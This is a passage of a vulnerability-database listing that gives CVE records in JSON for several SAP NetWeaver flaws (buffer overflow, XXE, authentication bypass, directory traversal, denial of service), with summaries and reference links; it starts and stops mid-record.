"assignerShortName": "sap",
"cveId": "CVE-2020-6203",
"datePublished": "2020-03-10T20:20:04",
"dateReserved": "2020-01-08T00:00:00",
"dateUpdated": "2024-08-04T08:55:21.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-1592
Vulnerability from cvelistv5
Published
2020-01-23 18:58
Modified
2024-08-06 15:04
Severity ?
EPSS score ?
Summary
A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/57956 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/82064 | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/24511 | x_refsource_MISC | |
| http://www.securitytracker.com/id/1028148 | x_refsource_MISC | |
| http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities | x_refsource_MISC | |
| https://packetstormsecurity.com/files/cve/CVE-2013-1592 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T15:04:49.354Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1592"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-23T18:58:44",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1592"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-1592",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.securityfocus.com/bid/57956",
"refsource": "MISC",
"url": "http://www.securityfocus.com/bid/57956"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"name": "http://www.exploit-db.com/exploits/24511",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"name": "http://www.securitytracker.com/id/1028148",
"refsource": "MISC",
"url": "http://www.securitytracker.com/id/1028148"
},
{
"name": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"name": "https://packetstormsecurity.com/files/cve/CVE-2013-1592",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1592"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-1592",
"datePublished": "2020-01-23T18:58:44",
"dateReserved": "2013-02-04T00:00:00",
"dateUpdated": "2024-08-06T15:04:49.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6815
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1890819 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/55620 | third-party-advisory, x_refsource_SECUNIA | |
| https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/ | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.476Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1890819"
},
{
"name": "55620",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55620"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-11-01T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1890819"
},
{
"name": "55620",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55620"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6815",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1890819",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1890819"
},
{
"name": "55620",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55620"
},
{
"name": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6815",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.476Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6823
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.739Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-01-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6823",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6823",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.739Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2514
Vulnerability from cvelistv5
Published
2012-05-15 01:00
Modified
2024-08-06 19:34
Severity ?
EPSS score ?
Summary
The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75456 | vdb-entry, x_refsource_XF | |
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:34:25.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netweaver-diagieventsource-dos(75456)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-12-05T15:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netweaver-diagieventsource-dos(75456)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2514",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netweaver-diagieventsource-dos(75456)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2514",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-07T00:00:00",
"dateUpdated": "2024-08-06T19:34:25.886Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-5751
Vulnerability from cvelistv5
Published
2013-09-16 19:00
Modified
2024-08-06 17:22
Severity ?
EPSS score ?
Summary
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/54809 | third-party-advisory, x_refsource_SECUNIA | |
| http://osvdb.org/97350 | vdb-entry, x_refsource_OSVDB | |
| http://en.securitylab.ru/lab/PT-2012-24 | x_refsource_MISC | |
| https://websmp230.sap-ag.de/sap/support/notes/1779578 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/62391 | vdb-entry, x_refsource_BID | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/87121 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:22:30.136Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "54809",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/54809"
},
{
"name": "97350",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/97350"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://en.securitylab.ru/lab/PT-2012-24"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "62391",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/62391"
},
{
"name": "sap-netweaver-unspecified-dir-traversal(87121)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "54809",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/54809"
},
{
"name": "97350",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/97350"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://en.securitylab.ru/lab/PT-2012-24"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "62391",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/62391"
},
{
"name": "sap-netweaver-unspecified-dir-traversal(87121)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5751",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "54809",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/54809"
},
{
"name": "97350",
"refsource": "OSVDB",
"url": "http://osvdb.org/97350"
},
{
"name": "http://en.securitylab.ru/lab/PT-2012-24",
"refsource": "MISC",
"url": "http://en.securitylab.ru/lab/PT-2012-24"
},
{
"name": "https://websmp230.sap-ag.de/sap/support/notes/1779578",
"refsource": "MISC",
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "62391",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/62391"
},
{
"name": "sap-netweaver-unspecified-dir-traversal(87121)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5751",
"datePublished": "2013-09-16T19:00:00",
"dateReserved": "2013-09-16T00:00:00",
"dateUpdated": "2024-08-06T17:22:30.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-1291
Vulnerability from cvelistv5
Published
2012-02-23 18:00
Modified
2024-09-16 22:46
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/52101 | vdb-entry, x_refsource_BID | |
| http://dsecrg.com/pages/vul/show.php?id=415 | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1585527 | x_refsource_MISC | |
| http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a | x_refsource_CONFIRM | |
| http://secunia.com/advisories/47861 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:53:37.020Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47861"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-02-23T18:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47861"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1291",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "52101",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=415",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"name": "https://service.sap.com/sap/support/notes/1585527",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"name": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "47861",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47861"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1291",
"datePublished": "2012-02-23T18:00:00Z",
"dateReserved": "2012-02-23T00:00:00Z",
"dateUpdated": "2024-09-16T22:46:13.378Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2511
Vulnerability from cvelistv5
Published
